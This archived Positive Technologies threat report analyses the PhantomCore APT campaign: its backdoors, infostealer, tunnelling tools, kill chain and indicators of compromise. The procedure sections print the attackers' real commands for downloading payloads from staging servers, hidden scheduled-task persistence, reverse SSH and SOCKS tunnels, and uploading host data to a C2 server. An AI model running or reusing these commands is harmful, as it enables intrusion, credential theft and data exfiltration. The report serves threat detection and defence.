{
	"id": "1452498e-337b-4e86-8381-6b58c7fd2109",
	"created_at": "2026-04-10T03:21:02.991838Z",
	"updated_at": "2026-04-10T03:22:19.178728Z",
	"deleted_at": null,
	"sha1_hash": "caee5f1ec4aeac2d66389622cccc85bb0aabefe3",
	"title": "Phantom pains: a large-scale cyberespionage campaign and a possible split within the PhantomCore APT group",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 928356,
	"plain_text": "Phantom pains: a large-scale cyberespionage campaign and a possible\r\nsplit within the PhantomCore APT group\r\nBy Positive Technologies\r\nPublished: 2025-09-09 · Archived: 2026-04-10 02:54:35 UTC\r\nAnalysis of tools\r\n1.    PhantomRAT\r\nPhantomRAT is a backdoor written in Go and delivered as a PE executable in the first phase of the cyberattack to gain initial access\r\nand download the following payload: PhantomTaskShell, PhantomProxyLite, MeshAgent, and RSocx.\r\nThe backdoor does not use persistence techniques on the infected host.\r\nDefense Evasion\r\nTo detect debugging, virtualization, and analysis tools, PhantomRAT calls the WinAPI function IsDebuggerPresent()\r\nand checks the Windows registry keys DriverDesc and SYSTEM\\ControlSet001\\Services\\Disk for the string \"vmware\".\r\nDiscovery\r\nPhantomRAT collects the following information on the infected host:\r\nParameter Description Collection method\r\nhost Host name Calling the golang function os.Hostname()\r\nuser Username\r\nRetrieving the value of the USERNAME environment\r\nvariable by calling the golang function os.Getenv()\r\ndomain Domain\r\nRetrieving the value of the USERDOMAIN environment\r\nvariable by calling the golang function os.Getenv()\r\nlocal_ip\r\nHost IP address\r\non the local network\r\nCalling the golang function net.InterfaceAddrs()\r\npublic_ip Host external IP address Sending a request to the external service https://ident.me\r\nCommand and Control\r\nPhantomRAT checks connectivity to the C2 server:\r\nGET /connect\r\nand sends JSON with host details:\r\n \r\nPOST /init\r\nJSON with information about the infected system\r\nNext, PhantomRAT regularly polls the C2 server for commands to execute on the compromised host:\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 1 of 22\n\nPOST /command\r\nThe C2 server replies with JSON 
containing a Response field, which includes the command type (cmd_id)\r\nand the command data (cmd_data) to execute on the host.\r\nJSON with information about the command\r\nThe command-type parameter (cmd_id) can take several values:\r\nCommand Purpose\r\nUp Download a file from a remote host to the hardcoded directory C:\\ProgramData\\\r\nEx\r\nRun the command passed in cmd_data in the Windows command line interpreter as cmd\r\n/s /c \"\u003ccmd_data\u003e | cmd\"\r\nSt\r\nRun a process on the infected host (for example, a previously downloaded file): cmd.exe\r\n/C start \"\u003ccmd_data\u003e\"\r\nPhantomRAT sends command execution results in a similarly structured JSON object:\r\n \r\nPOST /out\r\nJSON object with the command execution results\r\nThe PhantomRAT code also includes a function that checks the connection with the C2 server:\r\nPOST /check\r\nHowever, regardless of the outcome, the backdoor doesn't perform any action. This looks like a test function and is likely\r\nstill under development.\r\nDetected samples:\r\nc34fb316e7b60cff25be9c86e5736b802b9e99b1ac29daa03b08c3435b6ada8c\r\n278f051832c4b2c95ba899d685478bd3430f74d21aea367377cc17788c3a5638\r\nc67cf425d688bba6dbe00e6d86a501f6978664ff99c1811c7104f4a3f4b7e884\r\n31cc62a06720e0c20f03e0cb912bb92b20e5f339ae9c7280b235f63ac35eda9a\r\n9287fd8adc333469eabe655ccf13b78e1abb6e42c0cc6817ae66372fb126a683\r\nKey characteristics:\r\nPE executable written in Go\r\nNo persistence techniques\r\nUses defense evasion techniques\r\nCollects a broad range of host information\r\nSupports multiple action types on the compromised host\r\nNo encryption for data being transferred\r\nHardcoded constant: path C:\\ProgramData\r\n2.    PhantomRShell\r\nPhantomRShell is a C++ backdoor delivered as a DLL. 
It's used in the first stage of the cyberattack to gain initial access\r\nand to download the following payload: PhantomTaskShell, PhantomProxyLite, MeshAgent, and RSocx.\r\nThe backdoor does not implement Persistence or Defense Evasion techniques.\r\nDiscovery\r\nPhantomRShell uses WinAPI functions to collect the following information about the compromised host:\r\nParameter Description Collection method\r\nGUID Identifier Calling the CoCreateGuid() WinAPI function\r\nhostname Host name Calling the GetComputerNameW() WinAPI function\r\nAD Domain Calling the GetComputerNameExW() WinAPI function\r\nIn case of an error, the string UNKNOWN is used as the parameter value.\r\nNext, one of the following working directories is created: C:\\ProgramData\\YandexCloud or C:\\ProgramData\\MicrosoftAppStore.\r\nCommand and Control\r\nIn requests to the C2 server, the User-Agent header is set to one of the following:\r\nYandexCloud/1.0\r\nMicrosoftAppStore/2001.0\r\nPhantomRShell makes three attempts to connect to the C2 server. If all fail, the backdoor sleeps for 10 seconds and retries.\r\nOnce connected, PhantomRShell transfers host information to the server.\r\nGET /poll?id=\u003cGUID\u003e\u0026hostname=\u003chostname\u003e\u0026domain=\u003cAD\u003e\r\nUser-Agent: YandexCloud/1.0\r\nNext, PhantomRShell receives commands from the C2 server to run on the compromised host, in one of the following\r\nformats:\r\nCommand Purpose\r\ncmd:\u003ccmd_data\u003e|\r\n\u003ccmd_ID\u003e\r\nExecute the cmd_data command in the Windows command line\r\ninterpreter in the form:\r\ncmd.exe /C \u003ccmd_data\u003e\r\ndownload:\u003ccmd_data\u003e|\r\n\u003ccmd_ID\u003e\r\nDownload a file from a remote host into one of the previously created\r\ndirectories:\r\n— C:\\ProgramData\\YandexCloud\r\n— C:\\ProgramData\\MicrosoftAppStore\r\nThe command execution results are returned to the C2 as JSON in the result field. 
When a command to download a file from\r\na remote host is executed, the result field contains either Download successful:\u003cpath\u003e or Download failed, depending\r\non whether the download succeeded:\r\n \r\nPOST /result\r\nUser-Agent: YandexCloud/1.0\r\nJSON object with the command execution results\r\nDetected samples:\r\ned9b24a77a74cd34c96b30f8de794fe85eb1d9f188f516bd7d6020cc81a86728\r\n4c78d6bba282aaff0eab749cfa8a28e432f7cbf9c61dec8de8f4800fd27e0314\r\n204544fc8a8cac64bb07825a7bd58c54cb3e605707e2d72206ac23a1657bfe1e\r\n413c9e2963b8cca256d3960285854614e2f2e78dba023713b3dd67af369d5d08\r\nb683235791e3106971269259026e05fdc2a4008f703ff2a4d32642877e57429a\r\nbe14fc604c840c3afff9542106c73ed247417de5a56b1e9b2843e7947f0722d9\r\n01f12bb3f4359fae1138a194237914f4fcdbf9e472804e428a765ad820f399be\r\nKey characteristics:\r\nDynamic-link library (DLL) written in C++\r\nNo persistence techniques\r\nNo defense evasion techniques\r\nSupports multiple action types on the compromised host\r\nCollects a broad range of host information\r\nNo encryption for data being transferred\r\nUses specific User-Agent values\r\nHardcoded constant: path C:\\ProgramData\\YandexCloud\r\nHardcoded constant: path C:\\ProgramData\\MicrosoftAppStore\r\nImpersonates software from Russian IT vendors\r\n3.    
PhantomTaskShell\r\nPhantomTaskShell is a PowerShell backdoor used across all post-Initial Access stages of the cyberattack to let operators\r\ncontrol infected hosts via the Phantom control panel and to download the following payload: PhantomStealer, OpenSSH,\r\nXenArmor All-In-One Password Recovery Pro, and RClone.\r\nOn first launch, PhantomTaskShell creates update_id.txt on the infected host and writes in it the GUID value generated via\r\nthe [System.Guid]::NewGuid() function.\r\nFor persistence, a Windows Task Scheduler job named SystemAdminAgent_\u003cGUID\u003e that runs PhantomTaskShell\r\nfor 9,999 days, regardless of power source (battery or AC), is registered on the infected host. On each run,\r\nPhantomTaskShell checks for the update_id.txt file containing the GUID.\r\nIf the update_id.txt file is missing (first run), PhantomTaskShell registers the infected host in the Phantom panel by sending\r\nthe GUID and the hostname (obtained from the COMPUTERNAME environment variable) to the C2 server:\r\n \r\nPOST /api/clients\r\nJSON object with information about the infected host\r\nNext, PhantomTaskShell polls the Phantom control panel every 60 seconds for commands to execute on the infected host.\r\n \r\nGET /api/clients/GUID/commands\r\nCommand request code\r\nThe C2 server returns a list where each item starts with \"Pending:\" followed by the command to run on the infected host.\r\nList of commands obtained from C2\r\nCommand execution code on the infected host\r\nPhantomTaskShell sends the command execution results back to the same URL as JSON.\r\nJSON with the command execution results\r\nAll PhantomTaskShell actions are logged to update.log on the infected host.\r\nConstants in the PhantomTaskShell code\r\nDetected 
sample:\r\n9f9acdd833f3fd7b8bf987a8cc17e9456546fdcbcfe80c3b0dfc57c6f62d3e4b\r\n4.    PhantomStealer\r\nPhantomStealer is an infostealer written in Go, used during the Credential Access stage. It targets authentication data saved\r\nin Yandex Browser, Google Chrome, and Discord. It isn't an open source utility but contains usage instructions.\r\nInfostealer usage instructions\r\nRun settings:\r\nprogram: software to process (Yandex Browser, Google Chrome, or Discord).\r\nModes of use:\r\n-c: export authentication data\r\n-d: import authentication data\r\nIn export mode, the infostealer extracts, decrypts, and saves authentication data for each supported application to separate files,\r\nthen packages them into a single ZIP archive:\r\nYandex Browser: yandex-udak64.dat\r\nGoogle Chrome: chromecc16.dat\r\nDiscord: discord-key.dat\r\nThe import function—unusual for infostealers—likely helps PhantomStealer operators deal with the stolen accounts later.\r\nDetected sample:\r\nc3d05d7d6e1c50c6bd493fd5613c3204e6beadf8b6e4915cdf2f899fabf86a4e\r\n5.    PhantomProxyLite\r\nPhantomProxyLite is used at the Persistence and Defense Evasion stages. It sets up an SSH tunnel between\r\nthe compromised host and the C2 server to maintain reliable access to the victim network.\r\nPhantomProxyLite runs as a background service named SSHService. 
On first launch, it generates a random reverse port\r\nnumber for the C2 server (greater than 12559), stores it in the Windows registry at HKLM\\SOFTWARE\\SSHService,\r\nand reuses it on each subsequent start.\r\nIn the C:\\Windows\\Temp directory, a file named config is created with SSH tunneling parameters for routing network traffic\r\nto the C2 server.\r\nWriting configuration parameters to a file\r\nPhantomProxyLite launches ssh.exe on the infected host with settings from the configuration file and the Windows registry,\r\nand establishes a reverse SSH tunnel to the proxy server on port 443, disguising malicious traffic as legitimate HTTPS.\r\nStarting the ssh.exe client\r\nDetected samples:\r\nb701272e20db5e485fe8b4f480ed05bcdba88c386d44dc4a17fe9a7b6b9c026b\r\n2611121e4100b60e8644211bdc831144ba8b772d4d40e616864e7a723a9d7bf8\r\na2be4d9fdba560a4706ff8c4b32f092ef476f203c96e1b4afaf391cfe82aa533\r\n6.    XenArmor All-In-One Password Recovery Pro\r\nXenArmor All-In-One Password Recovery Pro is a commercial utility for recovering authentication data in Windows\r\noperating systems. 
The utility is used at the Credential Access stage.\r\nPhantomCore purchased the utility via a privileged Gold-status account registered on July 16, 2024 at netu@tuta[.]com.\r\nXenArmor license file\r\nTwo purchases were made from this account: on July 16, 2024, the 2023 version of the utility, observed at the start\r\nof the analyzed cyberespionage campaign; and on May 13, 2025, an updated version, likely intended for use in future\r\ncyberattacks in 2025–2026.\r\nPhantomCore account\r\nPurchase of the utility, 2023\r\nPurchase of the utility, 2025\r\n7.    RClone\r\nRClone is an open source utility for synchronizing data between a local computer and cloud storage. It is used by PhantomCore\r\nat the Exfiltration stage to pull data from infected hosts.\r\nThe RClone sample identified by the threat intelligence team, downloaded from one of the group's payload staging servers,\r\ncorresponds to version 1.69.1 of the utility, as confirmed by a hash sum match between the detected sample and the official\r\nrepository data.\r\nAccording to the configuration of the detected sample, PhantomCore uses a Mega[.]nz cloud storage account registered\r\nto mariaaa228@proton[.]me for data exfiltration.\r\nRClone configuration file\r\nKill chain and cyberattack TTPs\r\n1. 
Initial Access\r\nTools:\r\nPhantomRAT\r\nPhantomRShell\r\nInfrastructure:\r\n195.58.54.39\r\n91.239.148.21\r\n188.127.254.44\r\n185.225.17.104\r\nBackdoors are delivered as polyglot files, using, among other methods, hacked email accounts of legitimate Russian\r\ncompanies.\r\nMalicious email sent from a compromised mailbox carrying a PhantomRShell sample\r\nDetection in the PT Threat Intelligence Portal\r\n2. Persistence, Defense Evasion\r\nTools:\r\nPhantomTaskShell\r\nPhantomProxyLite\r\nMeshAgent\r\nOpenSSH\r\nRSocx\r\nInfrastructure:\r\naustolns.pw\r\nmgfoms.org\r\nnextcloud.soft-trust.com\r\nnextcloud.1cbit.dev\r\nnextcloud.trust-sec.it.com\r\nsoftline-solutions.cloud\r\n194.87.253.233\r\n213.232.204.110\r\n194.116.215.36\r\n46.8.71.104\r\n217.19.4.206\r\n91.239.148.211\r\n193.187.174.251\r\n185.130.251.227\r\n195.133.32.213\r\n193.187.174.3\r\n194.116.215.166\r\n185.130.251.219\r\n88.66.89.231\r\n188.127.254.234\r\n91.219.151.103\r\n91.219.151.59\r\n45.8.228.253\r\n45.158.169.131\r\nProcedures:\r\nUsing PhantomRAT or PhantomRShell, download an archive with a MeshAgent sample from one of the group's\r\npayload staging servers, extract it, and create a Windows Task Scheduler task for its daily hidden execution at 10:00\r\na.m.\r\nDownloading MeshAgent from a VPS server\r\niwr -Uri \"http://188.127.254.234:443/remote.zip\" -OutFile \"C:\\ProgramData\\remote.zip\"\r\niwr -Uri \"http://188.127.254.234:80/dnsclient.zip\" -OutFile \"C:\\ProgramData\\dnsclient.zip\"\r\niwr -Uri http://188.127.254.234:80/inetpub.zip -OutFile C:\\ProgramData\\inetpub.zip\r\ncertutil.exe -urlcache -f 
http://188.127.254.234:80/remote.zip C:\\ProgramData\\remote.zip\r\nDownloading MeshAgent from a compromised site\r\nup https://\u003credacted\u003e/inetpub.zip C:\\ProgramData\\inetpub.zip\r\nDownloading MeshAgent from a phishing site with a fake CAPTCHA\r\npowershell -WindowStyle Hidden -Command \"\u0026 {iwr 'https://mgfoms.org/in.php?action=2' -OutFile '%userprofile%\\dnsclient.ex\r\nExtracting MeshAgent\r\nexpand-archive -force -path C:\\ProgramData\\inetpub.zip -destinationpath C:\\ProgramData\\\r\nexpand-archive -force -path C:\\ProgramData\\dnsclient.zip -destinationpath C:\\ProgramData\\\r\nCreating a task in the Windows Task Scheduler\r\nschtasks /create /sc DAILY /tn \\\"Microsoft Update\\\" /tr \\\"C:\\ProgramData\\YandexCloud\\dnsclient.bat\\\" /mo 1 /st 10:00\r\nschtasks /create /sc DAILY /tn \\\"Microsoft Update\\\" /tr \\\"C:\\ProgramData\\YandexCloud\\dnsclient.bat\\\" /st 10:00\r\nschtasks /create /sc DAILY /tn \\\"Microsoft Update\\\" /tr \\\"C:\\ProgramData\\YandexCloud\\dnsclient.bat\\\" /st 10:01 /f\r\nschtasks /create /sc DAILY /tn \\\"Yandex Update\\\" /tr \\\"powershell -WindowStyle Hidden -Command Start-Process 'C:\\ProgramDa\r\nschtasks /create /sc DAILY /tn DNS /tr \\\"powershell -WindowStyle Hidden -Command Start-Process 'C:\\ProgramData\\dnsclient.e\r\nschtasks /create /sc DAILY /tn DNS /tr \\\"powershell -WindowStyle Hidden -Command Start-Process 'C:\\ProgramData\\inetpub.exe\r\nUsing PhantomRAT or PhantomRShell, the OpenSSH client is downloaded from the official GitHub repository\r\nand installed, a reverse SSH tunnel is set up on port 80 (HTTP) or 443 (HTTPS) with passwordless and keyless\r\nauthentication, and a Windows Task Scheduler task is created to run it daily at 9:00 a.m.\r\nDownloading and installing the OpenSSH client\r\nmsiexec /qn /i 
https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.8.3.0p2-Preview/OpenSSH-Win64-v9.8.3.0.ms\r\nOpenSSH directory listing\r\ndir \"C:\\Program Files\\OpenSSH\"\r\ndir \\\"C:\\Program Files\\OpenSSH\\\"\r\ndir C:\\windows\\system32\\Openssh\r\nViewing the SSH version\r\nssh -V\r\nCreating an SSH tunnel\r\nssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 37124 -p 80 vtvvuaweuvefafoe\r\nssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 31238 -p 443 vtvvuaweuvefafoe\r\nssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 37581 -p 443 cfyvg84df17842o@\r\nCreating a task in the Windows Task Scheduler\r\nschtasks /create /sc DAILY /tn SSH /tr \\\"C:\\Windows\\system32\\OpenSSH\\ssh.exe -o StrictHostKeyChecking=no -o ServerAliveIn\r\nschtasks /create /sc DAILY /tn Update /tr \\\"'C:\\Windows\\system32\\OpenSSH\\ssh.exe' -o StrictHostKeyChecking=no -o ServerAli\r\nUsing PhantomRAT or PhantomRShell, download an RSocx sample from a compromised legitimate site, extract it,\r\nand run it stealthily; establish a network connection to the C2 server on port 443 (HTTPS) or 8080 (HTTP) over\r\nthe SOCKS5 protocol:\r\nDownloading RSocx\r\nup https://\u003credacted\u003e/hosts.zip C:\\ProgramData\\hosts.zip\r\nExtracting RSocx\r\npowershell expand-archive -force -path \"C:\\\\ProgramData\\\\hosts.zip\" -destinationpath \"C:\\\\ProgramData\\\\\"\r\nStarting RSocx\r\nC:\\ProgramData\\hosts.exe -r 193.187.174.251:443\r\nC:\\ProgramData\\hosts.exe -r 195.133.32.213:8080\r\nstart /B \"\" \"C:\\\\ProgramData\\\\hosts.exe -r 193.187.174.251:443\"\r\nStart-Process -FilePath \"C:\\ProgramData\\hosts.exe\" -ArgumentList \"-r 193.187.174.251:443\" 
-NoNewWindow\r\nStart-Process -FilePath \\\"C:\\ProgramData\\hosts.exe\\\" -ArgumentList \\\"-r 193.187.174.251:443\\\" -NoNewWindow\r\nUsing PhantomRAT or PhantomRShell, a PhantomTaskShell sample is downloaded from a compromised site,\r\nextracted, and executed on the infected system:\r\nDownloading PhantomTaskShell\r\nup https://\u003credacted\u003e/update.zip C:\\ProgramData\\update.zip\r\nExtracting PhantomTaskShell\r\nexpand-archive -force -path C:\\ProgramData\\update.zip -destinationpath C:\\ProgramData\\\r\nStarting PhantomTaskShell\r\npowershell C:\\ProgramData\\MicrosoftAppStore\\update.ps1\r\npowershell C:\\ProgramData\\YandexCloud\\update.ps1\r\n3. Credential Access\r\nTools:\r\nXenArmor All-In-One Password Recovery Pro\r\nPhantomStealer\r\nInfrastructure:\r\n188.127.254.234\r\nProcedures:\r\nUsing PhantomTaskShell, which receives commands from the Phantom control panel, download the XenArmor All\r\nIn One Password Recovery Pro utility from a payload staging server, extract, and run it on the infected system with\r\nan option to write discovered and recovered authentication data to an HTML file, then remove the utility from\r\nthe system.\r\nDownloading XenArmor All-In-One Password Recovery Pro\r\niwr -Uri \"http://188.127.254.234:80/one.zip\" -OutFile \"C:\\ProgramData\\one.zip\"\r\nExtracting the utility\r\nexpand-archive -force -path C:\\ProgramData\\one.zip -destinationpath C:\\ProgramData\r\nStarting the utility with results written to an HTML file\r\nC:\\ProgramData\\XenAllPasswordPro.exe -a C:\\ProgramData\\\u003credacted\u003e.html\r\nDeleting the utility\r\ndel C:\\ProgramData\\one.zip\r\ndel C:\\ProgramData\\XenAllPasswordPro.exe\r\nUsing PhantomTaskShell, which receives commands from the Phantom control panel, download the PhantomStealer\r\nsample from 
a payload staging server, extract it, and run it on the infected system with an option to copy\r\nauthentication data saved in known web browsers, and remove the infostealer from the system.\r\nDownloading PhantomStealer\r\niwr -Uri \"http://188.127.254.234:80/browser.zip\" -OutFile \"C:\\ProgramData\\browser.zip\"\r\nExtracting PhantomStealer\r\nexpand-archive -force -path C:\\ProgramData\\browser.zip -destinationpath C:\\ProgramData\\\r\nStarting PhantomStealer\r\nC:\\ProgramData\\browser.exe chrome -c\r\ncd C:\\ProgramData; .\\browser.exe yandex -c\r\nDeleting PhantomStealer\r\ndel \"C:\\ProgramData\\browser.exe\"\r\n4. Discovery, Lateral Movement\r\nTools:\r\nPhantomTaskShell\r\nInfrastructure:\r\n185.130.249.224\r\nProcedures (executed via the PhantomTaskShell backdoor, which receives tasks from the Phantom control panel):\r\nProcedure Command\r\nObtaining information about\r\nlocal users\r\nwhoami \r\nquser\r\nObtaining information about\r\nActive Directory groups\r\nand users\r\nnet user\r\nnet user /domain\r\nnet user \u003credacted\u003e /domain\r\nnet group /domain\r\nnet group \\\"Domain Admins\\\" /domain\r\n\u003credacted\u003e, \u003credacted\u003e | ForEach-Object { net user $_ /domain }\r\nCollecting OS and file system\r\ninformation\r\nsysteminfo\r\nwmic logicaldisk get caption\r\nObtaining information about\r\nsystem processes and services\r\nget-service\r\ntasklist\r\nAnalyzing Windows\r\nDefender configurations\r\nget-mppreference\r\nDirectory listing\r\ndir S:\\\r\ndir C:\\\r\ndir C:\\users\\\u003credacted\u003e\r\ndir C:\\users\\\u003credacted\u003e\\documents\r\ndir C:\\users\\\u003credacted\u003e\\downloads\r\ndir C:\\users\\\u003credacted\u003e\\desktop\r\ndir C:\\Users\\\u003credacted\u003e\\AppData\\Roaming\r\ndir C:\\ProgramData\r\ndir 
\\\"C:\\Program Files (x86)\\\"\r\npwd\r\nAnalyzing the network\r\nenvironment and routing\r\nparameters\r\narp -a\r\nipconfig\r\nroute print\r\nnestat -ano\r\nnslookup 127.0.0.1\r\nnslookup \u003credacted\u003e.ru\r\nping 10.64.70.172 -n 1\r\nping \u003credacted\u003e -n 2\r\nSending the information\r\nabout the infected system\r\nto the C2 server\r\nC:\\Windows\\System32\\curl.exe -v -F\r\n\"file=@C:\\ProgramData\\user_report.txt\" -F\r\n\"destinationPath=./user_report.txt\" http://185.130.249.224:80/upload\r\n5. Collection, Exfiltration\r\nTools:\r\nRClone\r\nMega.nz storage\r\nInfrastructure:\r\n195.133.32.213\r\nProcedures:\r\nUsing PhantomTaskShell, which receives commands from the Phantom control panel, start the certutil.exe utility\r\nfrom Windows Certificate Services with the -urlcache and -f parameters and download an RClone sample and its\r\nconfiguration file from the C2 server on port 8000.\r\nProcedure Command\r\nDownloading RClone\r\ncertutil.exe -urlcache -f \"http://195.133.32.213:8000/srvhost.exe\"\r\n\"C:\\ProgramData\\srvhost.exe\"\r\nDownloading\r\na configuration file\r\ncertutil.exe -urlcache -f \"http://195.133.32.213:8000/wusa.conf\"\r\n\"C:\\ProgramData\\wusa.conf\"\r\nUsing PhantomTaskShell, which receives commands from the Phantom control panel, download a sample\r\nof an unknown PowerShell script from the C2 server's port 80 and extract it (we could not obtain it during\r\nthe research):\r\nProcedure Command\r\nDownloading the PowerShell\r\nscript\r\niwr -Uri \"http://188.127.254.234:80/load.zip\" -OutFile\r\n\"C:\\\\ProgramData\\\\load.zip\"\r\nExtracting the PowerShell\r\nscript\r\nexpand-archive -force -path C:\\ProgramData\\load.zip -destinationpath\r\nC:\\ProgramData\\\r\nUsing PhantomTaskShell, which receives commands from the Phantom 
control panel, run a PowerShell tool with\r\nthe script execution disabled and options -r (recursive search) and -e (list of file extensions). Collect Microsoft Office\r\nand text documents, image files, LNK files, and configuration files for RDP and OpenVPN connections.\r\nProcedure Command\r\nStarting\r\nthe PowerShell script\r\npowershell -ex bypass C:\\ProgramData\\load.ps1 -Path C:\\Users\\ -r -e\r\n\"pdf,xls,xlsx,doc,docx,txt,jpg,ovpn,rdp,lnk\"\r\nDeleting tools:\r\nProcedure Command\r\nDeleting tools\r\ndel \"C:\\ProgramData\\wusa.conf\"\r\ndel \"C:\\ProgramData\\srvhost.exe\"\r\ndel \"C:\\ProgramData\\load.ps1\"\r\ndel \"C:\\ProgramData\\load.zip\"\r\nDirectories used to store tools:\r\nC:\\ProgramData\\\r\nC:\\ProgramData\\YandexCloud\r\nC:\\ProgramData\\MicrosoftAppStore\r\nC:\\Windows\\system32\\OpenSSH\r\nTasks in the Windows Task Scheduler\r\nYandex Update\r\nMicrosoft Update\r\nUpdate\r\nSSH\r\nDNS\r\nMimicking legitimate files in the tool names\r\nssh.exe\r\nhosts.exe\r\ninetpub.exe\r\nsrvhost.exe\r\nMalicious files:\r\ndnsclient.zip\r\ndnsclient.bat\r\ninetpub.zip\r\ninetpub.exe\r\nhosts.zip\r\nhosts.exe\r\nupdate.zip\r\nupdate.ps1\r\nremote.zip\r\nremote.exe\r\nremote.dll\r\nload.zip\r\nload.ps1\r\none.zip\r\none.exe\r\nxenallpassword.exe\r\nbrowser.zip\r\nbrowser.exe\r\nsrvhost.exe\r\nwusa.conf\r\nFile-based IoCs\r\nMD5 SHA-1 SHA-256\r\n75a26a138783032ee18dcfc713b1b34c 04d364d7cc98379352e89757d62521271cb410cb ed9b24a77a74cd34c96b30f8de794fe85eb1d9f18\r\nb586cf958334415777719bf512304fbd 775b7e726ba6cf6d9a6463a62797c97612018066 4c78d6bba282aaff0eab749cfa8a28e432f7cbf9c6\r\n7e52be17fd33a281c70fec14805113a8 6942e07e7d08781cba571211a08e779838e72e9a 204544fc8a8cac64bb07825a7bd58c54cb3e60570\r\n65967d019076e700deb20dcbc989c99c 
49a18dc1d8f84394d3373481dbac89d11e373dbd 413c9e2963b8cca256d3960285854614e2f2e78db\r\nb49a7ef89cfb317a540996c3425fcdc2 d9a4fd39a55cd20d55e00d3cace3f637b8888213 b683235791e3106971269259026e05fdc2a4008f\r\nbe990a49fa1e3789ebc5c55961038029 851157c01da6e85ffa94ded7f42cab19aa8528d6 01f12bb3f4359fae1138a194237914f4fcdbf9e472\r\n20d4805eb8547e9b28672a31adbc3600 c679d9cffe1bd722c4ee78f63328833264c5257e be14fc604c840c3afff9542106c73ed247417de5a5\r\nMD5 SHA-1 SHA-256\r\n43651c96ed10637b5c0e454c32e4809a 8aa3394ced3fcc14004f51062c658c4967d0cc40 c34fb316e7b60cff25be9c86e5736b802b9e99b1ac\r\na0846758c1852d141f657dd6a01adcce 2f6c55acf5ed41321a4ac4d728e31b8ee02ff34f 31cc62a06720e0c20f03e0cb912bb92b20e5f339a\r\ne3493bced3a25d0bf61980cb797afca5 293bd87a7b909b13cad58833366adb2711cbcdcd 278f051832c4b2c95ba899d685478bd3430f74d21\r\n55b31d3ae389473e6aee7a9a41e21bd2 3e764cb46a922703d864b6055eeefd2beacb97c8 c67cf425d688bba6dbe00e6d86a501f6978664ff99\r\n5437e08743347bca0430689341198e57 efa8725598260e13647836abe2e500c089839839 9287fd8adc333469eabe655ccf13b78e1abb6e42c0\r\nMD5 SHA-1 SHA-256\r\ne58777bd5d52fe5ec4ea20ccd1b92c57 c059ee9b367a7e8cfdfcc2da3d9cc851c47f4ffd b701272e20db5e485fe8b4f480ed05bcdba88c386d\r\nMD5 SHA-1 SHA-256\r\n33f3cb133c23760869244a322b386d77 57c983f14bf810236eddc067277ba9daeb7a2de7 2611121e4100b60e8644211bdc831144ba8b772d4\r\n10bbc42c0aa376ba0c53733f47c3d251 0d249e064f42cff0ec3deaff285811a14cffb8f1 a2be4d9fdba560a4706ff8c4b32f092ef476f203c96\r\nMD5 SHA-1 SHA-256\r\n996084dc1175befd223d495a10c0e9e9 5469ae3e42e962746e4671a5587fdc009e6f60fe 9f9acdd833f3fd7b8bf987a8cc17e9456546fdcbcfe8\r\nMD5 SHA-1 SHA-256\r\n27210561cccac29d590b2ecd60670ab8 ed6ab3142369a6707d55552f40c8a5efd705f15b c3d05d7d6e1c50c6bd493fd5613c3204e6beadf8b6\r\nMD5 SHA-1 SHA-256\r\n016ebfd9c774fac33ad95be75595e9e1 
5fc484e0d81b5edd021e91407b7bd98b8a8d13f1 ad0e3a42120602534512ac4a4415a9fb867f0ecc71\r\na2481680fe6f44d8d5ce2397a300a85f a862e22462f721830df414be16595eb2f8900291 2d79ea29838f1c35648658bbb6e48573630c15a11\r\n72bacb7c922053694cd2b3324c7de2a0 e268dd5068ad19faed1ed0e7fd045b67ccb95cdd b350beb7f069da939aec1eef6fd428fcbc0e17edac9\r\nMD5 SHA-1 SHA-256\r\ncd915c6d6cb455fb2786cb4e2debdafc 5fe6ae13ed4d0b3302a023cd81eed28252b8e166 d7d6894c2fbce3d91af8de50e7cd649f12627d94a1a\r\nNetwork IoCs\r\nIndicator Purpose\r\n188.127.254.44 PhantomRShell C2 server\r\n91.239.148.21 PhantomRShell C2 server\r\n185.225.17.104 PhantomRShell C2 server\r\n195.58.54.39 PhantomRAT C2 server\r\n193.187.174.3 PhantomProxyLite C2 server\r\n194.116.215.166 PhantomProxyLite C2 server\r\n193.187.174.251 RSocx C2 server\r\n194.87.253.233 MeshAgent C2 server\r\n213.232.204.110 MeshAgent C2 server\r\n194.116.215.36 MeshAgent C2 server\r\n46.8.71.104 MeshAgent C2 server\r\n217.19.4.206 MeshAgent C2 server\r\n91.239.148.211 MeshAgent C2 server\r\naustolns.pw MeshAgent C2 domain\r\nnextcloud.1cbit.dev MeshAgent C2 domain\r\nnextcloud.trust-sec.it.com MeshAgent C2 domain\r\nsoftline-solutions.cloud MeshAgent C2 domain\r\nnextcloud.soft-trust.com MeshAgent C2 domain\r\nmgfoms.org Phishing site with MeshAgent\r\n195.133.32.213 Server with SSH tunnel\r\n185.130.251.227 Server with SSH tunnel\r\n185.130.251.219 Server with SSH tunnel\r\n88.66.89.231 Server with SSH tunnel\r\nIndicator Purpose\r\n45.158.169.131 Server with SSH tunnel\r\n91.219.151.103 Server with SSH tunnel and control panel\r\n91.219.151.59 Server with SSH tunnel and control panel\r\n45.8.228.253 Server with SSH tunnel and control panel\r\n185.130.249.224 Server for downloading information about the infected host\r\n188.127.254.234 Payload staging 
